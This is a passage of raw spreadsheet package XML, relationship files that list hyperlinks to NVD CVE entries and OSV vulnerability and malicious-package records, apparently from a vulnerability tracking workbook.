Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84428" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84504" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86610" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87970" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87973" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89296" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90776" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90972" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90974" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91776" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91777" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92081" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92172" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92173" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92412" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93981" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96173" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96200" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96255" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17339" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17340" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17341" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17342" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17343" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17344" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17345" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17346" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17347" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17348" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17349" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17350" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17351" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17352" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17353" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17354" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17355" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17356" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17357" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17358" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17359" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17360" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17361" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17362" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17363" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17364" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17365" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17366" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17367" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17368" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17369" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17370" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17371" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17372" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17373" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17374" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17375" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17376" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17377" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17378" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17379" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17380" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17381" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17382" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17383" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17384" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17385" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17386" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17387" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17388" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17389" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17390" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17391" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17392" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17393" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17394" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17395" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17396" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17397" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17398" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17399" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17400" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17401" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17402" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17403" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17404" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17405" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17406" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17407" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17408" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17409" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17410" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17411" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17412" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17413" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17414" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17415" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17416" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17417" TargetMode="External" Id="rId741" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94952" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100758" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103056" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54400" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103040" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103041" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79536" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79537" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97689" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67993" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71971" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74220" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74221" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94953" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94954" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95362" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100700" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102253" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103043" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61519" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102911" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102794" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102875" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79403" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100702" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100756" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95301" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95344" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95376" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102930" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97687" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100241" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100244" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102728" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102758" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54873" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100288" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103054" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74225" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100699" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97688" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102310" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102320" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102330" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95297" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95330" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95366" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101911" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101912" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102635" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79535" TargetMode="External" Id="rId61" 